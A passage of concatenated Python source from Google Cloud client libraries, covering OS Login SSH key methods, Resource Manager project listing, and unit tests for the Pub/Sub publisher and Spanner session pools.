google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
if metadata is None:
metadata = []
metadata = list(metadata)
request = oslogin_pb2.GetSshPublicKeyRequest(name=name, )
return self._get_ssh_public_key(
request, retry=retry, timeout=timeout, metadata=metadata)
def import_ssh_public_key(self,
parent,
ssh_public_key,
project_id=None,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None):
"""
Adds an SSH public key and returns the profile information. Default POSIX
account information is set when no username and UID exist as part of the
login profile.
Example:
>>> from google.cloud import oslogin_v1
>>>
>>> client = oslogin_v1.OsLoginServiceClient()
>>>
>>> parent = client.user_path('[USER]')
>>> ssh_public_key = {}
>>>
>>> response = client.import_ssh_public_key(parent, ssh_public_key)
Args:
parent (str): The unique ID for the user in format ``users/{user}``.
ssh_public_key (Union[dict, ~google.cloud.oslogin_v1.types.SshPublicKey]): The SSH public key and expiration time.
If a dict is provided, it must be of the same form as the protobuf
message :class:`~google.cloud.oslogin_v1.types.SshPublicKey`
project_id (str): The project ID of the Google Cloud Platform project.
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will not
be retried.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.cloud.oslogin_v1.types.ImportSshPublicKeyResponse` instance.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
if metadata is None:
metadata = []
metadata = list(metadata)
request = oslogin_pb2.ImportSshPublicKeyRequest(
parent=parent,
ssh_public_key=ssh_public_key,
project_id=project_id,
)
return self._import_ssh_public_key(
request, retry=retry, timeout=timeout, metadata=metadata)
def update_ssh_public_key(self,
name,
ssh_public_key,
update_mask=None,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None):
"""
Updates an SSH public key and returns the profile information. This method
supports patch semantics.
Example:
>>> from google.cloud import oslogin_v1
>>>
>>> client = oslogin_v1.OsLoginServiceClient()
>>>
>>> name = client.fingerprint_path('[USER]', '[FINGERPRINT]')
>>> ssh_public_key = {}
>>>
>>> response = client.update_ssh_public_key(name, ssh_public_key)
Args:
name (str): The fingerprint of the public key to update. Public keys are identified by
their SHA-256 fingerprint. The fingerprint of the public key is in format
``users/{user}/sshPublicKeys/{fingerprint}``.
ssh_public_key (Union[dict, ~google.cloud.oslogin_v1.types.SshPublicKey]): The SSH public key and expiration time.
If a dict is provided, it must be of the same form as the protobuf
message :class:`~google.cloud.oslogin_v1.types.SshPublicKey`
update_mask (Union[dict, ~google.cloud.oslogin_v1.types.FieldMask]): Mask to control which fields get updated. Updates all if not present.
If a dict is provided, it must be of the same form as the protobuf
message :class:`~google.cloud.oslogin_v1.types.FieldMask`
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will not
be retried.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.cloud.oslogin_v1.types.SshPublicKey` instance.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
if metadata is None:
metadata = []
metadata = list(metadata)
request = oslogin_pb2.UpdateSshPublicKeyRequest(
name=name,
ssh_public_key=ssh_public_key,
update_mask=update_mask,
)
return self._update_ssh_public_key(
request, retry=retry, timeout=timeout, metadata=metadata)
```
#### File: gapic/v1/test_publisher_client_v1.py
```python
import pytest
from google.cloud.pubsub_v1.gapic import publisher_client
from google.cloud.pubsub_v1.proto import pubsub_pb2
from google.iam.v1 import iam_policy_pb2
from google.iam.v1 import policy_pb2
from google.protobuf import empty_pb2
from google.protobuf import field_mask_pb2
class MultiCallableStub(object):
"""Stub for the grpc.UnaryUnaryMultiCallable interface."""
def __init__(self, method, channel_stub):
self.method = method
self.channel_stub = channel_stub
def __call__(self, request, timeout=None, metadata=None, credentials=None):
self.channel_stub.requests.append((self.method, request))
response = None
if self.channel_stub.responses:
response = self.channel_stub.responses.pop()
if isinstance(response, Exception):
raise response
if response:
return response
class ChannelStub(object):
"""Stub for the grpc.Channel interface."""
def __init__(self, responses=[]):
self.responses = responses
self.requests = []
def unary_unary(self,
method,
request_serializer=None,
response_deserializer=None):
return MultiCallableStub(method, self)
class CustomException(Exception):
pass
class TestPublisherClient(object):
def test_create_topic(self):
# Setup Expected Response
name_2 = 'name2-1052831874'
expected_response = {'name': name_2}
expected_response = pubsub_pb2.Topic(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = publisher_client.PublisherClient(channel=channel)
# Setup Request
name = client.topic_path('[PROJECT]', '[TOPIC]')
response = client.create_topic(name)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = pubsub_pb2.Topic(name=name)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_create_topic_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = publisher_client.PublisherClient(channel=channel)
# Setup request
name = client.topic_path('[PROJECT]', '[TOPIC]')
with pytest.raises(CustomException):
client.create_topic(name)
def test_update_topic(self):
# Setup Expected Response
name = 'name3373707'
expected_response = {'name': name}
expected_response = pubsub_pb2.Topic(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = publisher_client.PublisherClient(channel=channel)
# Setup Request
topic = {}
update_mask = {}
response = client.update_topic(topic, update_mask)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = pubsub_pb2.UpdateTopicRequest(
topic=topic, update_mask=update_mask)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_update_topic_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = publisher_client.PublisherClient(channel=channel)
# Setup request
topic = {}
update_mask = {}
with pytest.raises(CustomException):
client.update_topic(topic, update_mask)
def test_publish(self):
# Setup Expected Response
message_ids_element = 'messageIdsElement-744837059'
message_ids = [message_ids_element]
expected_response = {'message_ids': message_ids}
expected_response = pubsub_pb2.PublishResponse(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = publisher_client.PublisherClient(channel=channel)
# Setup Request
topic = client.topic_path('[PROJECT]', '[TOPIC]')
data = b'-86'
messages_element = {'data': data}
messages = [messages_element]
response = client.publish(topic, messages)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = pubsub_pb2.PublishRequest(
topic=topic, messages=messages)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_publish_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = publisher_client.PublisherClient(channel=channel)
# Setup request
topic = client.topic_path('[PROJECT]', '[TOPIC]')
data = b'-86'
messages_element = {'data': data}
messages = [messages_element]
with pytest.raises(CustomException):
client.publish(topic, messages)
def test_get_topic(self):
# Setup Expected Response
name = 'name3373707'
expected_response = {'name': name}
expected_response = pubsub_pb2.Topic(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = publisher_client.PublisherClient(channel=channel)
# Setup Request
topic = client.topic_path('[PROJECT]', '[TOPIC]')
response = client.get_topic(topic)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = pubsub_pb2.GetTopicRequest(topic=topic)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_get_topic_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = publisher_client.PublisherClient(channel=channel)
# Setup request
topic = client.topic_path('[PROJECT]', '[TOPIC]')
with pytest.raises(CustomException):
client.get_topic(topic)
def test_list_topics(self):
# Setup Expected Response
next_page_token = ''
topics_element = {}
topics = [topics_element]
expected_response = {
'next_page_token': next_page_token,
'topics': topics
}
expected_response = pubsub_pb2.ListTopicsResponse(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = publisher_client.PublisherClient(channel=channel)
# Setup Request
project = client.project_path('[PROJECT]')
paged_list_response = client.list_topics(project)
resources = list(paged_list_response)
assert len(resources) == 1
assert expected_response.topics[0] == resources[0]
assert len(channel.requests) == 1
expected_request = pubsub_pb2.ListTopicsRequest(project=project)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_list_topics_exception(self):
channel = ChannelStub(responses=[CustomException()])
client = publisher_client.PublisherClient(channel=channel)
# Setup request
project = client.project_path('[PROJECT]')
paged_list_response = client.list_topics(project)
with pytest.raises(CustomException):
list(paged_list_response)
def test_list_topic_subscriptions(self):
# Setup Expected Response
next_page_token = ''
subscriptions_element = 'subscriptionsElement1698708147'
subscriptions = [subscriptions_element]
expected_response = {
'next_page_token': next_page_token,
'subscriptions': subscriptions
}
expected_response = pubsub_pb2.ListTopicSubscriptionsResponse(
**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = publisher_client.PublisherClient(channel=channel)
# Setup Request
topic = client.topic_path('[PROJECT]', '[TOPIC]')
paged_list_response = client.list_topic_subscriptions(topic)
resources = list(paged_list_response)
assert len(resources) == 1
assert expected_response.subscriptions[0] == resources[0]
assert len(channel.requests) == 1
expected_request = pubsub_pb2.ListTopicSubscriptionsRequest(
topic=topic)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_list_topic_subscriptions_exception(self):
channel = ChannelStub(responses=[CustomException()])
client = publisher_client.PublisherClient(channel=channel)
# Setup request
topic = client.topic_path('[PROJECT]', '[TOPIC]')
paged_list_response = client.list_topic_subscriptions(topic)
with pytest.raises(CustomException):
list(paged_list_response)
def test_delete_topic(self):
channel = ChannelStub()
client = publisher_client.PublisherClient(channel=channel)
# Setup Request
topic = client.topic_path('[PROJECT]', '[TOPIC]')
client.delete_topic(topic)
assert len(channel.requests) == 1
expected_request = pubsub_pb2.DeleteTopicRequest(topic=topic)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_delete_topic_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = publisher_client.PublisherClient(channel=channel)
# Setup request
topic = client.topic_path('[PROJECT]', '[TOPIC]')
with pytest.raises(CustomException):
client.delete_topic(topic)
def test_set_iam_policy(self):
# Setup Expected Response
version = 351608024
etag = b'21'
expected_response = {'version': version, 'etag': etag}
expected_response = policy_pb2.Policy(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = publisher_client.PublisherClient(channel=channel)
# Setup Request
resource = client.topic_path('[PROJECT]', '[TOPIC]')
policy = {}
response = client.set_iam_policy(resource, policy)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = iam_policy_pb2.SetIamPolicyRequest(
resource=resource, policy=policy)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_set_iam_policy_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = publisher_client.PublisherClient(channel=channel)
# Setup request
resource = client.topic_path('[PROJECT]', '[TOPIC]')
policy = {}
with pytest.raises(CustomException):
client.set_iam_policy(resource, policy)
def test_get_iam_policy(self):
# Setup Expected Response
version = 351608024
etag = b'21'
expected_response = {'version': version, 'etag': etag}
expected_response = policy_pb2.Policy(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = publisher_client.PublisherClient(channel=channel)
# Setup Request
resource = client.topic_path('[PROJECT]', '[TOPIC]')
response = client.get_iam_policy(resource)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = iam_policy_pb2.GetIamPolicyRequest(
resource=resource)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_get_iam_policy_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = publisher_client.PublisherClient(channel=channel)
# Setup request
resource = client.topic_path('[PROJECT]', '[TOPIC]')
with pytest.raises(CustomException):
client.get_iam_policy(resource)
def test_test_iam_permissions(self):
# Setup Expected Response
expected_response = {}
expected_response = iam_policy_pb2.TestIamPermissionsResponse(
**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = publisher_client.PublisherClient(channel=channel)
# Setup Request
resource = client.topic_path('[PROJECT]', '[TOPIC]')
permissions = []
response = client.test_iam_permissions(resource, permissions)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = iam_policy_pb2.TestIamPermissionsRequest(
resource=resource, permissions=permissions)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_test_iam_permissions_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = publisher_client.PublisherClient(channel=channel)
# Setup request
resource = client.topic_path('[PROJECT]', '[TOPIC]')
permissions = []
with pytest.raises(CustomException):
client.test_iam_permissions(resource, permissions)
```
#### File: cloud/resource_manager/client.py
```python
from google.api_core import page_iterator
from google.cloud.client import Client as BaseClient
from google.cloud.resource_manager._http import Connection
from google.cloud.resource_manager.project import Project
class Client(BaseClient):
"""Client to bundle configuration needed for API requests.
See
https://cloud.google.com/resource-manager/reference/rest/
for more information on this API.
Automatically get credentials::
>>> from google.cloud import resource_manager
>>> client = resource_manager.Client()
:type credentials: :class:`~google.auth.credentials.Credentials`
:param credentials: (Optional) The OAuth2 Credentials to use for this
client. If not passed (and if no ``_http`` object is
passed), falls back to the default inferred from the
environment.
:type _http: :class:`~requests.Session`
:param _http: (Optional) HTTP object to make requests. Can be any object
that defines ``request()`` with the same interface as
:meth:`requests.Session.request`. If not passed, an
``_http`` object is created that is bound to the
``credentials`` for the current object.
This parameter should be considered private, and could
change in the future.
"""
SCOPE = ('https://www.googleapis.com/auth/cloud-platform',)
"""The scopes required for authenticating as a Resouce Manager consumer."""
def __init__(self, credentials=None, _http=None):
super(Client, self).__init__(
credentials=credentials, _http=_http)
self._connection = Connection(self)
def new_project(self, project_id, name=None, labels=None):
"""Create a project bound to the current client.
Use :meth:`Project.reload() \
<google.cloud.resource_manager.project.Project.reload>` to retrieve
project metadata after creating a
:class:`~google.cloud.resource_manager.project.Project` instance.
.. note:
This does not make an API call.
:type project_id: str
:param project_id: The ID for this project.
:type name: str
:param name: The display name of the project.
:type labels: dict
:param labels: A list of labels associated with the project.
:rtype: :class:`~google.cloud.resource_manager.project.Project`
:returns: A new instance of a
:class:`~google.cloud.resource_manager.project.Project`
**without** any metadata loaded.
"""
return Project(project_id=project_id,
client=self, name=name, labels=labels)
def fetch_project(self, project_id):
"""Fetch an existing project and it's relevant metadata by ID.
.. note::
If the project does not exist, this will raise a
:class:`NotFound <google.cloud.exceptions.NotFound>` error.
:type project_id: str
:param project_id: The ID for this project.
:rtype: :class:`~google.cloud.resource_manager.project.Project`
:returns: A :class:`~google.cloud.resource_manager.project.Project`
with metadata fetched from the API.
"""
project = self.new_project(project_id)
project.reload()
return project
def list_projects(self, filter_params=None, page_size=None):
"""List the projects visible to this client.
Example::
>>> from google.cloud import resource_manager
>>> client = resource_manager.Client()
>>> for project in client.list_projects():
... print(project.project_id)
List all projects with label ``'environment'`` set to ``'prod'``
(filtering by labels)::
>>> from google.cloud import resource_manager
>>> client = resource_manager.Client()
>>> env_filter = {'labels.environment': 'prod'}
>>> for project in client.list_projects(env_filter):
... print(project.project_id)
See
https://cloud.google.com/resource-manager/reference/rest/v1beta1/projects/list
Complete filtering example::
>>> project_filter = { # Return projects with...
... 'name': 'My Project', # name set to 'My Project'.
... 'id': 'my-project-id', # id set to 'my-project-id'.
... 'labels.stage': 'prod', # the label 'stage' set to 'prod'
... 'labels.color': '*' # a label 'color' set to anything.
... }
>>> client.list_projects(project_filter)
:type filter_params: dict
:param filter_params: (Optional) A dictionary of filter options where
each key is a property to filter on, and each
value is the (case-insensitive) value to check
(or the glob ``*`` to check for existence of the
property). See the example above for more
details.
:type page_size: int
:param page_size: (Optional) Maximum number of projects to return in a
single page. If not passed, defaults to a value set
by the API.
:rtype: :class:`~google.api_core.page_iterator.Iterator`
:returns: Iterator of all
:class:`~google.cloud.resource_manager.project.Project`.
that the current user has access to.
"""
extra_params = {}
if page_size is not None:
extra_params['pageSize'] = page_size
if filter_params is not None:
extra_params['filter'] = filter_params
return page_iterator.HTTPIterator(
client=self,
api_request=self._connection.api_request,
path='/projects',
item_to_value=_item_to_project,
items_key='projects',
extra_params=extra_params)
def _item_to_project(iterator, resource):
"""Convert a JSON project to the native object.
:type iterator: :class:`~google.api_core.page_iterator.Iterator`
:param iterator: The iterator that has retrieved the item.
:type resource: dict
:param resource: A resource to be converted to a project.
:rtype: :class:`.Project`
:returns: The next project in the page.
"""
return Project.from_api_repr(resource, client=iterator.client)
```
#### File: tests/unit/test_pool.py
```python
from functools import total_ordering
import unittest
class TestAbstractSessionPool(unittest.TestCase):
def _getTargetClass(self):
from google.cloud.spanner_v1.pool import AbstractSessionPool
return AbstractSessionPool
def _make_one(self, *args, **kwargs):
return self._getTargetClass()(*args, **kwargs)
def test_ctor_defaults(self):
pool = self._make_one()
self.assertIsNone(pool._database)
def test_bind_abstract(self):
pool = self._make_one()
database = _Database('name')
with self.assertRaises(NotImplementedError):
pool.bind(database)
def test_get_abstract(self):
pool = self._make_one()
with self.assertRaises(NotImplementedError):
pool.get()
def test_put_abstract(self):
pool = self._make_one()
session = object()
with self.assertRaises(NotImplementedError):
pool.put(session)
def test_clear_abstract(self):
pool = self._make_one()
with self.assertRaises(NotImplementedError):
pool.clear()
def test_session_wo_kwargs(self):
from google.cloud.spanner_v1.pool import SessionCheckout
pool = self._make_one()
checkout = pool.session()
self.assertIsInstance(checkout, SessionCheckout)
self.assertIs(checkout._pool, pool)
self.assertIsNone(checkout._session)
self.assertEqual(checkout._kwargs, {})
def test_session_w_kwargs(self):
from google.cloud.spanner_v1.pool import SessionCheckout
pool = self._make_one()
checkout = pool.session(foo='bar')
self.assertIsInstance(checkout, SessionCheckout)
self.assertIs(checkout._pool, pool)
self.assertIsNone(checkout._session)
self.assertEqual(checkout._kwargs, {'foo': 'bar'})
class TestFixedSizePool(unittest.TestCase):
def _getTargetClass(self):
from google.cloud.spanner_v1.pool import FixedSizePool
return FixedSizePool
def _make_one(self, *args, **kwargs):
return self._getTargetClass()(*args, **kwargs)
def test_ctor_defaults(self):
pool = self._make_one()
self.assertIsNone(pool._database)
self.assertEqual(pool.size, 10)
self.assertEqual(pool.default_timeout, 10)
self.assertTrue(pool._sessions.empty())
def test_ctor_explicit(self):
pool = self._make_one(size=4, default_timeout=30)
self.assertIsNone(pool._database)
self.assertEqual(pool.size, 4)
self.assertEqual(pool.default_timeout, 30)
self.assertTrue(pool._sessions.empty())
def test_bind(self):
pool = self._make_one()
database = _Database('name')
SESSIONS = [_Session(database)] * 10
database._sessions.extend(SESSIONS)
pool.bind(database)
self.assertIs(pool._database, database)
self.assertEqual(pool.size, 10)
self.assertEqual(pool.default_timeout, 10)
self.assertTrue(pool._sessions.full())
for session in SESSIONS:
self.assertTrue(session._created)
def test_get_non_expired(self):
pool = self._make_one(size=4)
database = _Database('name')
SESSIONS = [_Session(database)] * 4
database._sessions.extend(SESSIONS)
pool.bind(database)
session = pool.get()
self.assertIs(session, SESSIONS[0])
self.assertTrue(session._exists_checked)
self.assertFalse(pool._sessions.full())
def test_get_expired(self):
pool = self._make_one(size=4)
database = _Database('name')
SESSIONS = [_Session(database)] * 5
SESSIONS[0]._exists = False
database._sessions.extend(SESSIONS)
pool.bind(database)
session = pool.get()
self.assertIs(session, SESSIONS[4])
self.assertTrue(session._created)
self.assertTrue(SESSIONS[0]._exists_checked)
self.assertFalse(pool._sessions.full())
def test_get_empty_default_timeout(self):
from six.moves.queue import Empty
pool = self._make_one(size=1)
queue = pool._sessions = _Queue()
with self.assertRaises(Empty):
pool.get()
self.assertEqual(queue._got, {'block': True, 'timeout': 10})
def test_get_empty_explicit_timeout(self):
from six.moves.queue import Empty
pool = self._make_one(size=1, default_timeout=0.1)
queue = pool._sessions = _Queue()
with self.assertRaises(Empty):
pool.get(timeout=1)
self.assertEqual(queue._got, {'block': True, 'timeout': 1})
def test_put_full(self):
from six.moves.queue import Full
pool = self._make_one(size=4)
database = _Database('name')
SESSIONS = [_Session(database)] * 4
database._sessions.extend(SESSIONS)
pool.bind(database)
with self.assertRaises(Full):
pool.put(_Session(database))
self.assertTrue(pool._sessions.full())
def test_put_non_full(self):
pool = self._make_one(size=4)
database = _Database('name')
SESSIONS = [_Session(database)] * 4
database._sessions.extend(SESSIONS)
pool.bind(database)
pool._sessions.get()
pool.put(_Session(database))
self.assertTrue(pool._sessions.full())
def test_clear(self):
pool = self._make_one()
database = _Database('name')
SESSIONS = [_Session(database)] * 10
database._sessions.extend(SESSIONS)
pool.bind(database)
self.assertTrue(pool._sessions.full())
for session in SESSIONS:
self.assertTrue(session._created)
pool.clear()
for session in SESSIONS:
self.assertTrue(session._deleted)
class TestBurstyPool(unittest.TestCase):
def _getTargetClass(self):
from google.cloud.spanner_v1.pool import BurstyPool
return BurstyPool
def _make_one(self, *args, **kwargs):
return self._getTargetClass()(*args, **kwargs)
def test_ctor_defaults(self):
pool = self._make_one()
self.assertIsNone(pool._database)
self.assertEqual(pool.target_size, 10)
self.assertTrue(pool._sessions.empty())
def test_ctor_explicit(self):
pool = self._make_one(target_size=4)
self.assertIsNone(pool._database)
self.assertEqual(pool.target_size, 4)
self.assertTrue(pool._sessions.empty())
def test_get_empty(self):
pool = self._make_one()
database = _Database('name')
database._sessions.append(_Session(database))
pool.bind(database)
session = pool.get()
self.assertIsInstance(session, _Session)
self.assertIs(session._database, database)
self.assertTrue(session._created)
self.assertTrue(pool._sessions.empty())
def test_get_non_empty_session_exists(self):
pool = self._make_one()
database = _Database('name')
previous = _Session(database)
pool.bind(database)
pool.put(previous)
session = pool.get()
self.assertIs(session, previous)
self.assertFalse(session._created)
self.assertTrue(session._exists_checked)
self.assertTrue(pool._sessions.empty())
def test_get_non_empty_session_expired(self):
pool = self._make_one()
database = _Database('name')
previous = _Session(database, exists=False)
newborn = _Session(database)
database._sessions.append(newborn)
pool.bind(database)
pool.put(previous)
session = pool.get()
self.assertTrue(previous._exists_checked)
self.assertIs(session, newborn)
self.assertTrue(session._created)
self.assertFalse(session._exists_checked)
self.assertTrue(pool._sessions.empty())
def test_put_empty(self):
pool = self._make_one()
database = _Database('name')
pool.bind(database)
session = _Session(database)
pool.put(session)
self.assertFalse(pool._sessions.empty())
def test_put_full(self):
pool = self._make_one(target_size=1)
database = _Database('name')
pool.bind(database)
older = _Session(database)
pool.put(older)
self.assertFalse(pool._sessions.empty())
younger = _Session(database)
pool.put(younger) # discarded silently
self.assertTrue(younger._deleted)
self.assertIs(pool.get(), older)
def test_put_full_expired(self):
pool = self._make_one(target_size=1)
database = _Database('name')
pool.bind(database)
older = _Session(database)
pool.put(older)
self.assertFalse(pool._sessions.empty())
younger = _Session(database, exists=False)
pool.put(younger) # discarded silently
self.assertTrue(younger._deleted)
self.assertIs(pool.get(), older)
def test_clear(self):
pool = self._make_one()
database = _Database('name')
pool.bind(database)
previous = _Session(database)
pool.put(previous)
pool.clear()
self.assertTrue(previous._deleted)
class TestPingingPool(unittest.TestCase):
def _getTargetClass(self):
from google.cloud.spanner_v1.pool import PingingPool
return PingingPool
def _make_one(self, *args, **kwargs):
return self._getTargetClass()(*args, **kwargs)
def test_ctor_defaults(self):
pool = self._make_one()
self.assertIsNone(pool._database)
self.assertEqual(pool.size, 10)
self.assertEqual(pool.default_timeout, 10)
self.assertEqual(pool._delta.seconds, 3000)
self.assertTrue(pool._sessions.empty())
def test_ctor_explicit(self):
pool = self._make_one(size=4, default_timeout=30, ping_interval=1800)
self.assertIsNone(pool._database)
self.assertEqual(pool.size, 4)
self.assertEqual(pool.default_timeout, 30)
self.assertEqual(pool._delta.seconds, 1800)
self.assertTrue(pool._sessions.empty())
def test_bind(self):
pool = self._make_one()
database = _Database('name')
SESSIONS = [_Session(database)] * 10
database._sessions.extend(SESSIONS)
pool.bind(database)
self.assertIs(pool._database, database)
self.assertEqual(pool.size, 10)
self.assertEqual(pool.default_timeout, 10)
self.assertEqual(pool._delta.seconds, 3000)
self.assertTrue(pool._sessions.full())
for session in SESSIONS:
self.assertTrue(session._created)
def test_get_hit_no_ping(self):
pool = self._make_one(size=4)
database = _Database('name')
SESSIONS = [_Session(database)] * 4
database._sessions.extend(SESSIONS)
pool.bind(database)
session = pool.get()
self.assertIs(session, SESSIONS[0])
self.assertFalse(session._exists_checked)
self.assertFalse(pool._sessions.full())
def test_get_hit_w_ping(self):
import datetime
from google.cloud._testing import _Monkey
from google.cloud.spanner_v1 import pool as MUT
pool = self._make_one(size=4)
database = _Database('name')
SESSIONS = [_Session(database)] * 4
database._sessions.extend(SESSIONS)
sessions_created = (
datetime.datetime.utcnow() - datetime.timedelta(seconds=4000))
with _Monkey(MUT, _NOW=lambda: sessions_created):
pool.bind(database)
session = pool.get()
self.assertIs(session, SESSIONS[0])
self.assertTrue(session._exists_checked)
self.assertFalse(pool._sessions.full())
def test_get_hit_w_ping_expired(self):
import datetime
from google.cloud._testing import _Monkey
from google.cloud.spanner_v1 import pool as MUT
pool = self._make_one(size=4)
database = _Database('name')
SESSIONS = [_Session(database)] * 5
SESSIONS[0]._exists = False
database._sessions.extend(SESSIONS)
sessions_created = (
datetime.datetime.utcnow() - datetime.timedelta(seconds=4000))
with _Monkey(MUT, _NOW=lambda: sessions_created):
pool.bind(database)
session = pool.get()
self.assertIs(session, SESSIONS[4])
self.assertTrue(session._created)
self.assertTrue(SESSIONS[0]._exists_checked)
self.assertFalse(pool._sessions.full())
def test_get_empty_default_timeout(self):
from six.moves.queue import Empty
pool = self._make_one(size=1)
queue = pool._sessions = _Queue()
with self.assertRaises(Empty):
pool.get()
self.assertEqual(queue._got, {'block': True, 'timeout': 10})
def test_get_empty_explicit_timeout(self):
from six.moves.queue import Empty
pool = self._make_one(size=1, default_timeout=0.1)
queue = pool._sessions = _Queue()
with self.assertRaises(Empty):
pool.get(timeout=1)
self.assertEqual(queue._got, {'block': True, 'timeout': 1})
def test_put_full(self):
from six.moves.queue import Full
pool = self._make_one(size=4)
database = _Database('name')
SESSIONS = [_Session(database)] * 4
database._sessions.extend(SESSIONS)
pool.bind(database)
with self.assertRaises(Full):
pool.put(_Session(database))
self.assertTrue(pool._sessions.full())
def test_put_non_full(self):
import datetime
from google.cloud._testing import _Monkey
from google.cloud.spanner_v1 import pool as MUT
pool = self._make_one(size=1)
queue = pool._sessions = _Queue()
now = datetime.datetime.utcnow()
database = _Database('name')
session = _Session(database)
with _Monkey(MUT, _NOW=lambda: now):
pool.put(session)
self.assertEqual(len(queue._items), 1)
ping_after, queued = queue._items[0]
self.assertEqual(ping_after, now + datetime.timedelta(seconds=3000))
self.assertIs(queued, session)
def test_clear(self):
pool = self._make_one()
database = _Database('name')
SESSIONS = [_Session(database)] * 10
database._sessions.extend(SESSIONS)
pool.bind(database)
self.assertTrue(pool._sessions.full())
for session in SESSIONS:
self.assertTrue(session._created)
pool.clear()
for session in SESSIONS:
self.assertTrue(session._deleted)
def test_ping_empty(self):
pool = self._make_one(size=1)
pool.ping() # Does not raise 'Empty'
def test_ping_oldest_fresh(self):
pool = self._make_one(size=1)
database = _Database('name')
SESSIONS = [_Session(database)] * 1
database._sessions.extend(SESSIONS)
pool.bind(database)
pool.ping()
self.assertFalse(SESSIONS[0]._exists_checked)
def test_ping_oldest_stale_but_exists(self):
import datetime
from google.cloud._testing import _Monkey
from google.cloud.spanner_v1 import pool as MUT
pool = self._make_one(size=1)
database = _Database('name')
SESSIONS = [_Session(database)] * 1
database._sessions.extend(SESSIONS)
pool.bind(database)
later = datetime.datetime.utcnow() + datetime.timedelta(seconds=4000)
with _Monkey(MUT, _NOW=lambda: later):
pool.ping()
self.assertTrue(SESSIONS[0]._exists_checked)
def test_ping_oldest_stale_and_not_exists(self):
import datetime
from google.cloud._testing import _Monkey
from google.cloud.spanner_v1 import pool as MUT
pool = self._make_one(size=1)
database = _Database('name')
SESSIONS = [_Session(database)] * 2
SESSIONS[0]._exists = False
database._sessions.extend(SESSIONS)
pool.bind(database)
later = datetime.datetime.utcnow() + datetime.timedelta(seconds=4000)
with _Monkey(MUT, _NOW=lambda: later):
pool.ping()
self.assertTrue(SESSIONS[0]._exists_checked)
self.assertTrue(SESSIONS[1]._created)
class TestTransactionPingingPool(unittest.TestCase):
def _getTargetClass(self):
from google.cloud.spanner_v1.pool import TransactionPingingPool
return TransactionPingingPool
def _make_one(self, *args, **kwargs):
return self._getTargetClass()(*args, **kwargs)
def test_ctor_defaults(self):
pool = self._make_one()
self.assertIsNone(pool._database)
self.assertEqual(pool.size, 10)
self.assertEqual(pool.default_timeout, 10)
self.assertEqual(pool._delta.seconds, 3000)
self.assertTrue(pool._sessions.empty())
self.assertTrue(pool._pending_sessions.empty())
def test_ctor_explicit(self):
pool = self._make_one(size=4, default_timeout=30, ping_interval=1800)
self.assertIsNone(pool._database)
self.assertEqual(pool.size, 4)
self.assertEqual(pool.default_timeout, 30)
self.assertEqual(pool._delta.seconds, 1800)
self.assertTrue(pool._sessions.empty())
self.assertTrue(pool._pending_sessions.empty())
def test_bind(self):
pool = self._make_one()
database = _Database('name')
SESSIONS = [_Session(database) for _ in range(10)]
database._sessions.extend(SESSIONS)
pool.bind(database)
self.assertIs(pool._database, database)
self.assertEqual(pool.size, 10)
self.assertEqual(pool.default_timeout, 10)
self.assertEqual(pool._delta.seconds, 3000)
self.assertTrue(pool._sessions.full())
for session in SESSIONS:
self.assertTrue(session._created)
txn = session._transaction
self.assertTrue(txn._begun)
